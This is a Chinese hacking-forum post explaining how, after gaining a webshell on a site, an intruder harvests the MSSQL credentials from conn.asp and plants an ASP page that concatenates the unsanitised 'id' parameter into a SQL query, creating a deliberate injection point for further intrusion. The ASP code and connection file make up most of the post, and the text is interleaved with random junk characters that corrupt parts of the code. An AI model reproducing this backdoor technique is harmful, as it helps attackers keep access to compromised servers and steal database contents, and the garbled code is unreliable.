自己构造注入点方便入侵
1 f8 P; B$ k0 U; W( [
$ ?% H1 j g4 N3 r( o N今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息: P* x! _$ H4 c' L* c
/ s+ ]/ S2 _' R7 v
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
/ T& Z6 r6 }0 ^6 g5 y a
* d% `# x Z3 \+ _: F4 Y# y首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和4 K4 t' n- v: G# ?! G& E& Y# O5 x
/ @' m% R! q( t. R+ G0 e/ B9 ~密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表4 i. U4 x- ?5 j
, x- s/ X$ {! i0 o, z6 z
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:! M5 e' v) K# p* P
* f, M% b9 ?" |程序代码
- Y& y7 e2 {' } I0 P<!--#include file="xx.asp"-->
4 |: }/ T2 D# J4 m& r( g! N<%( O" @. Q7 O1 t6 I1 n9 c
set rs=server.createobject("ADODB.recordset"): u+ g0 D: m8 E" O9 z) S; u; D& ?( r
id = request("id")! {# [. P7 Y7 W
strSQL = "select * from admin where id=" & id
) s1 w# l9 T! ~ N- c! O. |rs.open strSQL,conn,1,3( p# U6 b! K7 _' W0 ~+ ]! W
rs.close' O+ F- F7 S' i( I# F
%>
7 S/ e* g; W- ?1 q9 M0 }% ]* z+ Y& d3 H. D1 q; b) _ d
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
& L2 B$ [" p- c9 \4 z' _, `. Q( j9 u9 x" c8 F+ ?
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!) b1 F& f6 _$ k0 N _; D7 X" y+ A
6 t: E! W0 t% d/ T1 G0 c( @5 `0 ]6 ^然后就要构造一个连接数据库的文件了,代码如下:
* Y/ k- B s- w7 d5 L e* \程序代码
2 z( r9 A, b( I0 l$ Z5 L<% 0 a5 B# u( D |, a; F. u/ l
strSQLServerName = "000.000.000.000" '服务器名称或地址
! Q- k8 J8 ]' g0 k* [* z [strSQLDBUserName = "sqlname" '数据库帐号% f9 _5 i6 g! U0 J5 u+ ?8 A& b
strSQLDBPassword = "sqlpass" '数据库密码
( X8 f# d8 m6 |1 n) [strSQLDBName = "sqldataname" '数据库名称6 K5 @# ^& m8 N8 O# [% L
Set conn = Server.CreateObject("ADODB.Connection")
% _8 I$ G) C. |strCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
& g( G8 P& v! {3 B! x' m Dconn.open strCon. x7 w3 B0 B9 ]: I2 Z# T. l1 I8 U
%>
5 C2 k! }- C9 p' e' C, G2 ~+ I; A) O! ^+ ?1 [3 `6 Z$ E
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,) y1 J: {8 T3 l# x7 f
6 s" N% h( ^3 U) D6 q+ A. P就这样,正常情况下,就OK了,伪造成功……) J/ r/ J! i2 w4 ~7 X! y
( d& k( ^1 t3 a; s: R( A
如果有什么问题可以提出来大家一起探讨解决。 |